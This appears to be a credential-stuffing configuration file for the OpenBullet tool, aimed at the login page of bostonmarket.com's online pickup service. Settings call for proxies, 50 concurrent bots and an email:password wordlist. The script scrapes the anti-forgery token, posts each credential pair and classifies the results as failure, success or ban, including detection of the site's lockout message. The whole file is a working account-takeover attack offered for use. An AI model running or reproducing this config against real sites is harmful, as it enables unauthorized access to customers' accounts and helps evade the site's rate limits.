[SETTINGS]
{
  "Name": "bostonmarket.com",
  "SuggestedBots": 50,
  "LastModified": "2018-10-09T08:03:18.0908037+00:00",
  "AdditionalInfo": "",
  "Author": "v0ilawes",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#get REQUEST GET "https://pickup.bostonmarket.com/user/login?url=%2F" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=TRUE BanOnToCheck=FALSE 
#__RequestVerificationToken PARSE "<SOURCE>" CSS "[name=__RequestVerificationToken]" "value" 0 -> VAR "__RequestVerificationToken" "" "" 
#post REQUEST POST "https://pickup.bostonmarket.com/user/login?url=%2F" AutoRedirect=TRUE 
  CONTENT "Email=<USER>&Password=<PASS>&__RequestVerificationToken=<__RequestVerificationToken>&Url=%2F&BasketGuid=&BasketGuidHash=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "origin: https://pickup.bostonmarket.com" 
  HEADER "referer: https://pickup.bostonmarket.com/user/login?url=%2F" 
KEYCHECK BanOn4XX=TRUE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "Invalid email or password" 
  KEYCHAIN Success OR 
    KEY "<SOURCE>" DoesNotContain "Invalid email or password" 
  KEYCHAIN Ban OR 
    KEY "Too many login attempts" 
